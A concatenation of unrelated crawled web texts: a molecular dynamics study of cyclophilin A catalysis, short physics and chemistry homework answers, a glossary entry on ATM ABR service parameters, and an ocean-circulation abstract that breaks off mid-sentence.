## Introduction A major goal of modern molecular biophysics is to clarify the connection between protein motions and enzymatic catalysis1,2,3. A wide range of experimental methods, e.g. neutron scattering, X-ray crystallography, NMR, or vibrational spectroscopy have been used to characterize internal protein motions occurring from femtosecond to second timescales4,5. While there is broad consensus that protein motions are implicated in catalysis, there is much debate around the role of conformational changes occurring on a millisecond timescale, and several studies have linked changes in millisecond protein motions with changes in enzymatic function6,7,8,9. However, it remains unclear whether such motions have a causal link to catalysis, or are merely a manifestation of the inherent flexibility of proteins over a broad range of timescales. There have been vigorous debates about the meaning of dynamics in the context of enzymatic catalysis10,11,12. In the framework of transition state theory, the reaction rate is given by Eq. 1: $$k = A(T)e^{ - \Delta G^\ddagger (T)/RT}$$ (1) where T is the temperature and R the gas constant. The pre-exponential term A(T) includes contributions from non-statistical motions such as re-crossing or tunnelling, The exponential term involves the activation free energy of the chemical step $$\Delta G^\ddagger (T)$$. If transitions between reactant states are fast compared to the time scale of the chemical reaction, $$\Delta G^\ddagger \left( T \right)$$ is the free energy difference between the thermally equilibrated ensembles describing the reactant and transition states13,14. Non-statistical motions described by A(T) have typically been found to make a small contribution to rate constants with respect to the exponential term that involves equilibrium fluctuations of the protein and solvent degrees of freedom15. The current work is concerned with the connection between rates of thermally equilibrated motions, and catalysis in enzymes. Specifically, the focus is on clarifying the nature of protein motions implicated in catalysis for the well-studied enzyme cyclophilin A (CypA). CypA is a member of the cyclophilin family of peptidyl-prolyl isomerases which catalyzes the cis/trans isomerization of amide groups in proline residues16. CypA plays an essential role in protein folding and regulation, gene expression, cellular signaling and the immune system. Notably, CypA is involved in the infectious activity and the viral replication of HIV-117. Accordingly, CypA has been the subject of structure-based drug design efforts for decades18,19,20. Because of its significance as a medical target, the catalytic mechanism of CypA has been the subject of extensive studies2,3,21,22,23,24,25,26,27,28,29,30. Computational studies have shown that the speedup of the of cis/trans isomerization rate of the prolyl peptide bond is a result of preferential transition state stabilization through selective hydrogen bonding interactions in the active site of CypA26,30. Figure 1a depicts key interactions between the substrate and active site residues, whereas Fig. 1b highlights the relevant ω angle of the substrate used to track the cis/trans isomerization reaction. Elegant NMR relaxation experiments by Eisenmesser et al.27 have also characterized the existence of intrinsic motions in apo CypA that couple a ‘major’ state M with a ‘minor’ conformational state m with a rate constant $$k_{M \to m}$$= 60 s−1. Fraser et al. later used ambient temperature X-ray crystallographic data to determine a high-resolution structure of this CypA state m, revealing an interconversion pathway with the ‘major’ state M that involves coupled rotations of a network of side-chains involving residues Ser99, Phe113, Met61, and Arg55. To establish the relevance of this ‘minor’ state m to catalysis, the distal residue Ser99 was mutated to Thr99 (now only referred to as ST). Further X-ray and NMR measurements on the free enzyme confirmed that the ST mutant increased the population of the m state, while decreasing the conversion rate $$k_{M \to m}$$ to 1 s−1 31. Remarkably, additional NMR experiments established that this 60-fold decrease in conversion rate between M and m states in the ST mutant correlates with a ca. 70-fold decrease in bidirectional isomerization rate ($$k_{iso} = k_{cis \to trans} + k_{trans \to cis}$$) of a model substrate with respect to wild-type (WT). The effect is comparable to rate decreases observed for mutations of key active site residues such as Arg5531. More recently, two further mutants were reported in an effort to rescue the lost enzymatic activity of ST. These mutations were S99T and C115S (now only referred to as STCS), or S99T, C115S, and I97V (now only referred to as STCSIV). The two newly introduced mutants recover the enzyme activity to some extent, which correlates with an increase in $$k_{M \to m}$$ values32. While this body of work suggested a link between millisecond time scale motions and catalysis in enzymes, there is currently no detailed mechanistic explanation for the decreased catalytic activity of the mutants. The present study uses a variety of extensive equilibrium and biased molecular dynamics (MD) simulations to clarify the link between catalytic activity and rates of molecular motions of CypA in wild-type and the three mutant variants. We show that the MD simulations reproduce well X-ray crystallography derived evidence for a shift in populations of major and minor active site conformations between the wild-type and mutant forms. Remarkably exchange between these active site conformations occurs at a rate that is five to six orders of magnitude faster than previously proposed. We show that the decrease in catalytic activity of the CypA mutants with respect to wild-type may be explained by changes in motions of residue Phe133 on a ns–μs timescale. Therefore millisecond time scale motions previously described in the literature may not be necessary to explain allosteric effects in cyclophilins. ## Results ### Major and minor conformations exchange on ns timescales Fraser et al. have described the proposed ‘major’ and ‘minor’ states according to sets of values of χ1 (Phe113, Ser/Thr99), χ2 (Met61) and χ3 (Arg55) angles31,33. These dihedrals as well as the side-chain dihedrals χ1 of Ile97 and Cys115 were used to construct a Markov state model (MSM) to obtain quantitative information on thermodynamic and kinetic properties of the WT protein and the three experimentally studied mutants. The consistency of the MSMs was evaluated using standard protocols and by evaluating robustness of the findings with respect to a range of model parameters (See Supplementary Figures 13 and Supplementary Tables 1 and 2). In the case of WT the accuracy of the MSM was additionally evaluated by back-calculation of previously reported NMR observables34. The MSM yields predictions of observables that show broadly similar accuracy to that of the NMR ensembles of Chi et al.35 and Otter et al.36 (see Supplementary Figures 4). Thus the simulations were deemed sufficiently consistent with experimental data to warrant further analyses. The X-ray structures of the key active site dihedrals in their dominantly populated states (if multiple occupancy is observed) are shown in Fig. 2a for WT and ST, Fig. 2b for WT and STCS, and Fig. 2c for WT and STCSIV mutants. The most striking feature of the ‘major’ and ‘minor’ conformations are the rotameric states of χ1 of Phe113 from the crystal structures, which in the ‘minor’ conformation is χ1 ≈ −60°. This will be referred to as the ‘out’ conformation. In contrast, the ‘major’ state χ1 ≈ 60°, takes an in’ conformation. In Fig. 2df crystal structure occupancies for Phe113 χ1 are compared to the MSM-derived dihedral distributions comparing WT and ST, WT and STCS, and WT and STCSIV respectively. The simulations suggest that in apo WT the Phe113 ‘in’ and ‘out’ orientations are equally likely, which is consistent with the relatively similar occupancies of the two rotamers in the X-ray structure (occupancies = 0.63 and 0.37 respectively)31. In apo ST there is a significant population shift towards the out’ orientation (χ1 = −60°), and the ‘in’ orientation has a marginal population (ca. 1%), see Fig. 2d. This agrees with the X-ray structure of ST where only the Phe113 out’ rotamer is observed (occupancy = 1.0). This also agrees with J-coupling measurements that show the dominant Phe113 χ1 angle is ca. −60° in ST31. In the STCS and STCSIV mutants the ‘in’ rotamer is also destabilized with respect to wild-type but to a lesser extent (populations of ca. 16% and 17% respectively). Though only one ‘out’ rotamer was resolved in the X-ray structure of STCS (Fig. 2e), a major ‘out’ and a minor distorted ‘in’ rotamer (χ1 = + 31°, occupancy 0.21) are observed in the X-ray structure of STCSIV (Fig. 2f). Rotamers of other side-chain dihedrals of the key residues for all WT and mutants are found in Supplementary Figures 5 and 6. Surprisingly the Phe113 χ1 dihedral was observed to flip frequently in MD trajectories of 200 ns duration (Supplementary Figures 79), suggesting faster motions than determined by NMR experiments. Therefore the MSMs were used to obtain quantitative information on transition rates between in’ and out’ states as defined by the Phe113 χ1 rotamer. Table 1 summarises the MSM results. The exchange rates vary from 208 ± 9 μs−1 (ST) to 39 ± 3 μs−1 (STCS). Remarkably these values are five orders of magnitude faster than the exchange rates that have been determined by NMR measurements for motions involving Phe113. ### The minor conformation is catalytically inactive Given that the timescales of rotations of Phe113 in the four CypA variants appear much faster than previously suggested, attention turned next to substrate bound CypA simulations. Results from umbrella sampling (US) simulations were used to quantify the isomerization free energy profile for WT and the ST mutant and investigate the role of Phe113 motions in catalysis (See Supplementary Figure 10). The isomerization free energy profiles for WT and ST mutant with the side-chain of the Phe113 in an ‘in’ and ‘out’ conformations are shown in Fig. 3a, b respectively. Ladani and Hamelberg28 have previously shown that fixed-charge classical force fields reproduce the energetics of amide bond rotation reasonably well due to relatively small changes in intramolecular polarization during this process. The calculated activation free energy for the uncatalyzed cistrans isomerization process in water is consistent with experimental data (20.1 ± 0.1 kcal mol−1 vs ca. 19.3 kcal mol−1 for the related substrate Suc-AAPF-pNA at 283 K)37,38. The free energy profile for the substrate bound to CypA WT and ST in the ‘in’ conformation shows that the enzyme catalyzes the isomerization reaction in both directions via a transition state with a positive ω value (ca. 90–100°) equally well (Fig. 3a). There is a more significant decrease in activation free energy for transcis (ca. −6 kcal mol−1) than for cistrans with less than 1 kcal mol−1 difference between WT and ST, because the cis form is more tightly bound to CypA than the trans form. According to Fig. 3b, there is no catalytic benefit from the out’ conformation of the enzyme since the activation free energy of the isomerization reaction in CypA is similar to that of the substrate in water. The calculated free energy profiles for isomerization reactions in STCS and STCSIV show a similar trend (Supplementary Figure 11). ### Transition -state destabilization in the minor conformation Further analysis of the US trajectories shows that for the simulations started in the ‘in’ configuration in both WT and ST the transition -state region (ω ca. 90–100°) is electrostatically stabilized by more negative Coulombic interactions between substrate and binding site atoms as shown in Fig. 4a. Figure 4b breaks down the different contribution of active site residues, showing that Arg55, Trp121, Asn102, His126, and Gln63 are important for the stabilization of the transition state ensemble via hydrogen bonding interactions as shown in Fig. 4e. In contrast, Fig. 4c shows that for simulations in the ‘out’ configuration no transition state stabilization through electrostatic interactions is observed, this is further reflected by the per-residue split of interaction energy contribution at the transition state in Fig. 4d and the lack of hydrogen bond formation in Fig. 4f. Hydrogen bonding probabilities for simulations from the in’ and ‘out’ starting conformations are shown in Supplementary Figures 1214. A similar picture holds for the STCS and STCSIV mutants (Supplementary Figure 15). Electrostatic interactions between the substrate and the solvent generally disfavour the transition state region in the ‘in’ conformation for all variants, consistent with a tightening of interactions of the active site residues with the transition state. For simulations carried out in the ‘out’ conformation no preferential electrostatic stabilization of a substrate state by the solvent is observed along the reaction coordinate, consistent with the lack of catalytic activity of CypA in this conformational state (Supplementary Figure 16) . ### Preorganization explains decreased in activity of the mutants Taken together the MSM and US data suggest a mechanistic explanation for the effect of distal mutations on the catalytic activity of cyclophilin A. In WT free form the enzyme rapidly interconverts between a catalytically active Phe113 ‘in’ form and a catalytically inactive Phe113 ‘out’ form. Because the interconversion rate between in and out forms (ca. 7 × 107 s−1) is faster than the substrate binding rate as suggested by NMR experiments (ca. 2 × 104 s−1, based on kon rate ca. 2 × 107 s−1 M−1 and substrate concentration ca. 1 mM)39 the free enzyme rapidly equilibrates between catalytically active and inactive forms before substrate binding (Fig. 5a). For the mutants, the interconversion rates between catalytically active and inactive forms are still within the μs−1 timescale, but the equilibrium is shifted towards the catalytically inactive form (Fig. 5b), thus the mutants are less pre-organized than WT and the overall catalytic activity is decreased. In the case of the ST mutant and WT forms, Fraser et al.31 have reported bi-directional on-enzyme isomerization rates $$(k_{cis \to trans} + k_{trans \to cis})$$ by NMR spectroscopy, and found a ratio of 68 ± 13 between WT and ST. According to the model proposed in Fig. 5 and by combining the MSM-derived populations and the US-derived activation free energies, a ratio of 12 < 46 < 176 can be derived from the simulations (see Supplementary Note 2 for details). The uncertainty from the simulations is larger than that of the measurements because small variations in activation free energies contribute large change in catalytic rates. Thus the model described in Fig. 5 appears consistent with experimental data for WT and ST. No bidirectional isomerization rates have been reported for the STCS and STCSIV mutants32. However, the STCS and STCSIV mutants show populations of the catalytically active Phe113 ‘in’ conformation that are intermediate between WT and ST, which is consistent with their increased catalytic activity with respect to ST. A defining feature of this model is that the χ1 rotamers of a number of active-site side-chains such as Gln63, Ile/Val97, Phe113, Cys/Ser115 flip in WT and mutants on ns–μs timescales. Back-calculation of Cβ–Cγ order parameters shows that this effect is captured by a decrease in S2 values upon increasing the averaging window from 10 to 100 ns (Supplementary Figure 17). Motions on these timescales are too rapid to be detected by CPMG or CEST NMR experiments that have been used extensively to study μs–ms processes in cyclophilin A3,25,31,40,41. Likewise NMR relaxation experiments cannot detect motions on this timescale as they are limited to processes occurring faster than the tumbling time τc of cyclophilin A (ca. 10 ns)42. Residual Dipolar Couplings (RDCs) can, however, provide information about dynamic orientation of inter-nuclear vectors on the supra-τc time scale43. Such experiments have been reported for backbone and methyl-RDCs in ubiquitin43,44. Therefore the model predictions can be experimentally tested with combined nuclear spin relaxation and RDC based model-free analyses coupled with a labelling scheme that resolves χ1 side-chain motions43,45. ## Discussion This work highlights the potential of detailed molecular simulation studies to guide the interpretation of biophysical measurements for the elucidation of allosteric mechanisms in proteins46. Previous work has suggested that exchange on millisecond timescales between conformational states in CypA are linked to its catalytic cycle27, leading to a proposal for a slow exchange between a ‘major’ and a ‘minor’ state of a set of side chain rotamers linking distal residue Ser99 to active-site residues27,31. The present results do not support or reject this hypothesis because the MD simulations used here do not resolve motional processes occurring on timescales slower than microseconds. However a major finding of this study is that transitions between ‘in’ and out’ rotamers of Phe 113 in WT and mutants occur on a time scale of ns–μs, thus five to six orders of magnitude faster than suggested by earlier NMR relaxation dispersion measurements31. Nevertheless the simulations reproduce well the population shifts in Phe113 rotamers observed in room-temperature X-ray crystallography experiments. This suggests that the X-ray structures may have resolved motional processes occurring on a distinct timescales from the processes resolved by CPMG experiments. Indeed in reported CPMG experiments the millisecond motions of Phe113 are coupled to a large network of ca. 30 residues31, whereas the χ1 rotameric flip observed in the simulations, is a largely local motion. Nevertheless, the simulations suggest that a local ‘in’ to ‘out’ rotation of Phe113 is sufficient to abrogate catalysis in cyclophilin A, and variations of exchange parameters on the ns–μs timescale between these two conformational states appear sufficient to explain the decreased catalytic activity of the ST, STCS, STCSIV mutants with respect to WT. Therefore it is advisable to carry out additional experiments to confirm the existence of Phe113 χ1 rotations on the ns–μs timescale before causally linking catalysis to millisecond time scale motions. On the computational side, efforts should focus on advancing MD methodologies such that millisecond timescale processes observed in experiments can be resolved in atomistic details. The contribution of protein flexibility on the ps–ns and μs–ms timescales to enzymatic catalysis has been the focus of several computational and experimental studies3,8,10,13,15,25,27,31,32,47. Our work suggests that more efforts should be directed at resolving conformational processes on the ns–μs timescale. This has important conceptual implications for enzyme design and optimization strategies. ## Methods ### Systems preparation Models for apo/substrate bound human CypA of the WT and ST were prepared for MD simulations from PDB structures 3K0N (R = 1.39 Å) and 3K0O (R = 1.55 Å) respectively. For apo STCS and STCSIV two structures were prepared from PDB structures 6BTA (R = 1.5 Å) and 5WC7 (R = 1.43 Å) and also by mutating residues in WT using Schrödinger’s Maestro47. For WT the major conformation of 3K0N (altloc A, occupancy 0.63) was retained. For STCS and STCSIV the residues with higher occupancy were chosen for initial structures. Supplementary Tables 3 and 4 summarise all simulations conducted in this study. The proteins were solvated in a rhombic dodecahedron box of TIP3P water molecules with edges extending 1 nm away from the proteins and chloride counter-ions were added to neutralise the overall net-charge. The Charmm22* forcefield48 was used to describe protein atoms in the apo simulations because previous work from Papaleo et al.33 has shown that this forcefield reproduces more accurately conformational changes in CypA. Steepest descent minimized was used for 50,000 steps followed by equilibration for 100 ps in an NVT ensemble, and 100 ps NPT ensemble, with heavy protein atoms restraint using a harmonic force constant of 1000 kJ mol−1 nm−2. Models of CypA WT and other mutants in complex with the Ace-AAPF-Nme substrate were prepared. The amber99sb forcefield was used for the complex simulations because Doshi and co-workers have reported optimised ω angle parameters for amides to simulate cis/trans isomerisation reactions49. The crystal structure of the CypA-cis AAPF peptide complex (PDB ID: 1RMH)50 was used to obtain a suitable orientation for the substrate in the active site of WT and other mutants. PDB structure 1RMH was aligned to the structure of WT and all mutants, and the N-terminal and C-terminal ends of the proteins and substrate were capped using Schrödinger’s Maestro47. In order to generate starting structures of ‘in’ and out’ CypA-substrate complexes, MD simulations of CypA-substrate complexes (cis-conformation) were performed for 10 ns. For ST, STCS and STCSIV mutants the χ1 values of Phe113 were measured to monitor transitions between ‘out’ and ‘in’ rotamers. The last snapshot structure of in’ and out’ complexes structures were used as input US calculations. For WT complexes, only the ‘in’ rotamer was observed in a 10-ns MD simulation. Thus, US simulations of χ1 (Phe113) were performed serially to generate the out’ (χ1 ≈ −60°) rotamer starting from the ‘in’ rotamer (χ1 ≈ 60°) using the software PLUMED251. Also, in order to retain the substrate in the active site, the distance between the proline ring of substrate and the phenyl rings of Phe113 and Phe60 were restrained using a force constant of 300 kJ mol−1 rad−2. Each US simulation was performed for 5 ns. The bias parameters and the restrained variables for the US of χ1 (Phe113) are summarised in Supplementary Table 7. ### apo WT and mutant MD simulations Eighty independent 200 ns MD trajectories of the apo WT, ST, STCS, and STCSIV proteins (20 each) were generated using Gromacs 5.052. For apo STCS and STCSIV the MD simulations were split between both structures prepared independently. A 2 fs time step was used, and the first 5 ns discarded for equilibration. Temperature was maintained at 300 K with a stochastic Berendsen thermostat53. The Parrinello-Rahman barostat was used for pressure coupling at 1 bar54. The Particle Mesh Ewald scheme was used for long-range electrostatic interactions with a Fourier grid spacing of 0.16 nm, and fourth-order cubic interpolation55. Short-range van der Waals and electrostatic interaction were cutoff at 1 nm. The LINCS algorithm was used to constrain all bonds56. ### Markov state models All MSM analysis was carried out with the software package pyemma version 2.3.257. The focus was on the side-chain motion of binding site residues. Details on which dihedral angles were used for TICA58 is given in Supplementary Table 8. A more detailed description of the MSM in particular with respect to best model selection is given in the SI. Clustering was done using all trajectory data from the WT and mutant trajectories using a set of 24 input coordinates, with selecting dominant coordinates using a 90% variance in TICA for the subsequent k-means clustering. Two hundred clusters were used to discretize the trajectory. With the same cluster assignment for all trajectories, MSM transition matrices were estimated, using the Bayesian MSM option, and choosing lagtimes 0.6 ns for WT, S99T, C115S, and I97V. Means and errors of observables (e.g. populations and MFPT) were estimated from the Bayesian MSM using the provided functions in pyEMMA. Membership assignments were based on the MSM microstate dihedral probabilities of being in the ‘in’ or ‘out’ state respectively. The microstate definition used for the MSMs is the same across the WT and all mutants. The MFPTs are estimated between the manually grouped two states depending on whether the Phe113 rotamer is in’ or out’ in the microstate. MSM validation and further details on the MSM can be found in the SI and in particular Supplementary Figures 13, Supplementary Tables 12 and Supplementary Note 159. MSM analyses were restricted to apo-enzymes because experimental data on the major to minor conformational exchange for the four variants is available for the apo forms only27,31,32. ### US simulations Series of US simulations60,61,62 of the ‘in’ and out’ conformers were performed to compute free energy profiles along ω26,28,63,64. For substrate in solution, the initial structure of US was in a trans conformation taken from 10-ns equilibration run, while all protein-substrate complexes were in a cis conformation. For both of in’ and ‘out’ US calculations, a standard harmonic potential was used to bias the ω angle towards a series of target values ωk spanning the interval [−180°,180°]. The force constants of the biasing potential and the spacing between ωk values were adjusted by trial and error in order to obtain a good overlap between probability distributions of neighbouring ωk values (Supplementary Tables 5 and 6 and Supplementary Figure 10). For ‘out’ US calculation the distances between the proline ring of substrate and the phenyl rings of Phe113 and Phe60 were restrained using a flat-bottom harmonic restraint with force constants of 200 kJ mol−1 rad−2 and 300 kJ mol−1 rad−2, respectively. Simulations were performed serially initially for 7 ns, with the starting conformation for a given target angle ωk taken from the preceding run performed at the neighbouring ωk+Δω value. Each US was then extended to 20 ns. A total of 22 (substrate in solution) or 24 (substrate bound to protein) umbrellas were used. In order to estimate uncertainties of free energy profiles six repeats of the entire procedure were performed for ‘in’ and ‘out’ US. All simulations were carried out using a PLUMED2 patched version of Gromacs 5.0 with simulation parameters identical to the previously described apo MD simulation protocols unless otherwise mentioned. The weighted histogram analysis method (WHAM) was used to produce a free energy profile from the pool of US simulations65. ### Other trajectory analyses Average proton–proton distances were derived as $$r_{ij}^{\mathrm{avg}} = \left\langle {r_{ij}^{ - 6}} \right\rangle ^{{\textstyle{{ - 1} \over 6}}}$$ from snapshots sampled from the MSM of WT for comparison with NOEs and eNOEs-derived distance intervals66. 3J(HN, Hα), 3J(HN, $$C^\prime$$), and 3J(HN, Cβ) were also computed using Karplus equations and backbone dihedral angle values <ϕ>  and <ψ> sampled from the MSM67. Interaction energies between binding site residues (Arg55, Ile57, Phe60, Met61, Gln63, Asn102, Gln111, Phe113, Trp121, Leu122 and His126) and all atoms of the substrate were analysed with the Gromacs g_energy module, using snapshots from the US simulations. The probability distribution of distances between key residues and substrate atoms during the simulations were computed using the MDAnalysis library69.
2022-12-06 12:08:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 2, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5366807579994202, "perplexity": 3913.3058918557194}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711077.50/warc/CC-MAIN-20221206092907-20221206122907-00407.warc.gz"}
http://www.chegg.com/homework-help/questions-and-answers/collapsible-plastic-bag-figure-contains-glucose-solution-average-gauge-pressure-vein-120-1-q2611593
## density A collapsible plastic bag (see figure) contains a glucose solution. If the average gauge pressure in the vein is 1.20×104 Pa, what must be the minimum height, h, of the bag in order to infuse glucose into the vein? Assume that the density of the solution is 1.03 kg/l.
2013-05-20 15:56:03
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.84425288438797, "perplexity": 2317.960450416352}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368699068791/warc/CC-MAIN-20130516101108-00011-ip-10-60-113-184.ec2.internal.warc.gz"}
https://socratic.org/questions/570f6c1f7c01491fd31019dd
# Question #019dd As you can see, steam typically reacts with alkenes by adding $H$ on one double-bonded atom and $O H$ on the other. But there are two possible choices for which atom gets the single hydrogen atom and which gets the $O H$ group. In some cases like (A) there is a perference (the Markovnikov rule), but the only sure way to get 100% of one product is to have the double bond in the middle of the molecule so that the two possible molecules are the same by symmetry. (C) does that.
2019-10-16 22:47:47
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 3, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6851058602333069, "perplexity": 549.2209422490013}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986670928.29/warc/CC-MAIN-20191016213112-20191017000612-00506.warc.gz"}
https://www.itwissen.info/en/ABR-service-parameter.html
# ABR service parameter ABR services are services defined by the ATM Forum for the available bit rate (ABR) in Asynchronous Transfer Mode (ATM). The parameters for the ABR services determine the transmission and delay times, the bandwidth allocation and the number of RM cells. The Trm parameters set the upper limit of the time between RM cells sent from an active source. The range for the Trm parameter is from 100* 2^-7 to 100*20. The Xrm parameter limits the number of outbound RM cells sent in time. The limitation takes place only if no backward RM cells are sent. The range for the Xrm parameter and the Xrm Decrease Factor( XDF) is between 0 and 255. The Nrm parameter determines the number of RM cells, which can be between 2 and 256. The Nrm value should be set higher if switches have a limited transmission capacity or if the transmission is real-time and therefore fluctuations in the data rate occur. The Mrm parameter controls the bandwidth allocation between the RM cells in forward and reverse direction as well as the data cells. In addition, there are ABR service parameters for increasing and decreasing the data rate and the cell transmission rate, such as the Rate Increase Factor( RIF) and the Rate Decrease Factor( RDF), the Permit Next Increase( PNI), the Time Out Factor ( TOF) and the Transmission Decrease Factor( TDF). The Rate Increase Factor (RIF) determines how much the cell transmission rate can be increased when receiving an RM (Resource Management) cell. The Rate Decrease Factor (RDF) controls the reduction of the cell transmission rate. Informations: Englisch: ABR service parameter Updated at: 21.01.2022 #Words: 255 Links: available bit rate (ATM) (ABR), asynchronous transfer mode (ATM), bit rate (BR), transmission, delay (DEL) Translations: DE Sharing:
2023-03-31 08:51:37
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.49775227904319763, "perplexity": 4354.977862756013}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949598.87/warc/CC-MAIN-20230331082653-20230331112653-00714.warc.gz"}
http://www.physicsforums.com/showthread.php?s=91019ddce2a7ebc2322dfdb1b260b766&p=4479837
# Why vector form is convenient? by manimaran1605 Tags: convenient, form, vector Math Emeritus Sci Advisor Thanks PF Gold P: 39,682 Because there are many different points the same distance from the origin (or any one point) of a coordinate system so a single number will not suffice to identify it. Equivalently, it take 3 numbers to identify everypoint in a 3D coordinate system (pretty much the definition of "3D") and it is convenient to arrange those numbers in an array. It is the fact, from geometry of similar triangles, that the coordinates $(x_0, y_0, z_0)$ of a point exactly 1/2 way between two points $(x_1, y_1, z_1)$ and $(x_2, y_2, z_2)$ are $(x_0, y_0, z_0)= ((x_1+ x_2)/2, (y_1+ y_2)/2, (z_1+ z_2)/2)$ that means that "scalar multiplication" of vectors is convenient (in fact, "scalar multiplication" and the whole idea of vectors was created to simplify that). (Arildno got in two minutes before me! And we are saying essentially the same thing.)
2014-09-17 15:33:47
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8692190647125244, "perplexity": 542.0336611414867}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-41/segments/1410657123996.28/warc/CC-MAIN-20140914011203-00232-ip-10-196-40-205.us-west-1.compute.internal.warc.gz"}
https://dept.atmos.ucla.edu/tcd/publication/ocean?page=3
# Ocean & coupled ocean Dijkstra HA, Ghil M. Low-frequency variability of the large-scale ocean circulation: a dynamical systems approach. Reviews of Geophysics. 2005;43.Abstract Oceanic variability on interannual, interdecadal, and longer timescales plays a key role in climate variability and climate change. Paleoclimatic records suggest major changes in the location and rate of deepwater formation in the Atlantic and Southern oceans on timescales from millennia to millions of years. Instrumental records of increasing duration and spatial coverage document substantial variability in the path and intensity of ocean surface currents on timescales of months to decades. We review recent theoretical and numerical results that help explain the physical processes governing the large-scale ocean circulation and its intrinsic variability. To do so, we apply systematically the methods of dynamical systems theory. The dynamical systems approach is proving successful for more and more detailed and realistic models, up to and including oceanic and coupled ocean-atmosphere general circulation models. In this approach one follows the road from simple, highly symmetric model solutions, through a “bifurcation tree,” toward the observed, complex behavior of the system under investigation. The observed variability can be shown to have its roots in simple transitions from a circulation with high symmetry in space and regularity in time to circulations with successively lower symmetry in space and less regularity in time. This road of successive bifurcations leads through multiple equilibria to oscillatory and eventually chaotic solutions. Key features of this approach are illustrated in detail for simplified models of two basic problems of the ocean circulation. First, a barotropic model is used to capture major features of the wind-driven ocean circulation and of the changes in its behavior as wind stress increases. Second, a zonally averaged model is used to show how the thermohaline ocean circulation changes as buoyancy fluxes at the surface increase. For the wind-driven circulation, multiple separation patterns of a “Gulf-Stream like” eastward jet are obtained. These multiple equilibria are followed by subannual and interannual oscillations of the jet and of the entire basin's circulation. The multiple equilibria of the thermohaline circulation include deepwater formation near the equator, near either pole or both, as well as intermediate possibilities that bear some degree of resemblance to the currently observed Atlantic overturning pattern. Some of these multiple equilibria are subject, in turn, to oscillatory instabilities with timescales of decades, centuries, and millennia. Interdecadal and centennial oscillations are the ones of greatest interest in the current debate on global warming and on the relative roles of natural and anthropogenic variability in it. They involve the physics of the truly three-dimensional coupling between the wind-driven and thermohaline circulation. To arrive at this three-dimensional picture, the 